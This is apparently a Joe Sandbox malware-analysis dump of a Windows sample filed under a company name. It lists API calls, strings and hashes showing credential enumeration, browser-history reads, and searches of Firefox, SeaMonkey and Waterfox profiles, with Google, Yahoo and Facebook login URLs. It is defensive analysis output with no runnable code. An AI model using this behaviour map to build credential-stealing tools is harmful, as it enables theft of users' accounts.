                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: C:\Windows\system32
                                                                                                    • API String ID: 669240632-2896066436
                                                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 697348961-0
                                                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                    • API String ID: 4039892925-11920434
                                                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                    • API String ID: 4039892925-3369679110
                                                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                    • String ID: $0.@
                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2941347001-0
                                                                                                    • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                    • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 71295984-2036018995
                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                    • String ID: "%s"
                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
